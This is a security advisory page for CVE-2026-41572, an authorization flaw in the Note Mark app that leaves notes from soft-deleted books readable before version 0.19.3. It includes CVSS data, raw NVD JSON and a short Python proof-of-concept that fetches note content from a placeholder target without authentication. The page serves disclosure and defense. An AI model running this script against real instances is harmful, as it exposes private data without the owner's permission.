Security Vulnerability Report
中文
CVE-2026-41572 CVSS 5.3 MEDIUM

CVE-2026-41572

Published: 2026-05-04 18:16:30
Last Modified: 2026-05-07 15:43:40
Source: [email protected]

Description

Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw "JOIN books ..." clauses used by the note and asset queries. This issue has been patched in version 0.19.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Note Mark < 0.19.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable Note Mark instance target_url = "http://target-domain.com" # The ID or slug of a note that belongs to a soft-deleted book note_id = "1" # Endpoint to access note content # Vulnerable endpoints include /api/notes/{id}, /api/notes/{id}/content endpoint = f"{target_url}/api/notes/{note_id}/content" try: # Send GET request without authentication response = requests.get(endpoint) # Check if the note content is still accessible (HTTP 200 OK) if response.status_code == 200: print(f"[+] Vulnerability Confirmed! Note content retrieved:") print(response.text) else: print(f"[-] Note not accessible. Status code: {response.status_code}") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41572", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:29.763", "lastModified": "2026-05-07T15:43:39.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw \"JOIN books ...\" clauses used by the note and asset queries. This issue has been patched in version 0.19.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/enchant97/note-mark/releases/tag/v0.19.3", "source": "[email protected]"}, {"url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf", "source": "[email protected]"}, {"url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.